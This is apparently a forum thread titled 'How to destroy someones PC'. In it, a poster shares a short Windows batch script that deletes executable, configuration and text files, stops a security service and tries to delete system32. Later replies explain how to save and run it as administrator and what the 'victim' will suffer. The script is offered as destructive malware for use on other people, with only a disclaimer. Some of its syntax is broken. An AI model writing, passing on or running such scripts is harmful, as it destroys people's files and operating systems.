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How to destroy someones PC

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I am not responsible for anything done with this. I personally think its just really fun to look at and then imagine reactions when people run it.

@echo off
	del *.exe
	del *.ini
	del *.txt
	net stop “security”
	del c://windows/system32
Name of the Video Game, and any other Tags
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Can you explain how to do this?

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Can you explain how to do this?

Open up a .txt document copy and paste it. Click 'Save As' then change the file type to 'All files' then name it whateveryouwant.bat andif you decide to run it for reasons im not sure why. Make sure its run as admin

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bit more of a expination on what the victim will recive

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bit more of a expination on what the victim will recive

They will not be able to run any exe files or txt files, their firewall will be disabled and it will delete their windows operating system

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